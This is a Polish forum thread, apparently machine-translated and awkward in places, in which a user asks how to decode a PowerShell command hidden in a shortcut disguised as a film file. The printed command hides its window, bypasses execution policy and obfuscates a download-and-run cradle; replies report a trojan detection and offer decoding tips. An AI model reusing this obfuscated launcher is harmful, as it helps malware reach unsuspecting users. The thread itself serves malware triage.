Mam plik, który powinien być filmem, ale okazał się skrótem do wykonania polecenia PowerShell. Szczegóły są następujące:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP &( $verBOSEprefeREncE.TOstRING()[1,3]+'x'-joiN'')( ('73w69Y88!40%78%101Y119%45!79c98!106%101!99!116c32c83G121Y115w116v101!109c46w78w101%116u46v87c101Y98%67%108b105:101w110G116%.
Czy ktoś może doradzić, co zrobiłaby ta komenda PowerShell lub gdzie mogę znaleźć szczegółowe informacje na temat jej dekodowania
Dzięki
Nie uruchamiaj żadnej części polecenia, jeśli nie jesteś pewien, co robisz i uważasz, że polecenie jest złośliwe.
—
root
Plik (o wielkości 750 MB i wyglądający jak plik filmowy) jest w rzeczywistości skrótem, a linia poleceń powyżej jest celem skrótu. Sprawdziłem i nie ma tam nic więcej, więc jeśli czegoś brakuje, musi to być jakaś zawartość.
—
kfbnlet,
Przedwcześnie opublikował poprzedni komentarz. Ran Malwarebytes, który zidentyfikował instalację instalacji trojana, kiedy uruchomiłem skrót, więc było to złośliwe oprogramowanie.
—
kfbnlet,
powershell.exe /?aby zobaczyć, jakie są pierwsze trzy-somethingpozycje. [2] biegnij,( $verBOSEprefeREncE.TOstRING()[1,3]+'x'-joiN'')aby zobaczyć, co to jest. jeśli nie znasz aliasów, uruchomGet-Aliasz tego wyjście. [3] reszta to prawdopodobnie początek polecenia zakodowanego w standardzie base64. to nie wszystko, więc nie ma sposobu, aby się tego upewnić.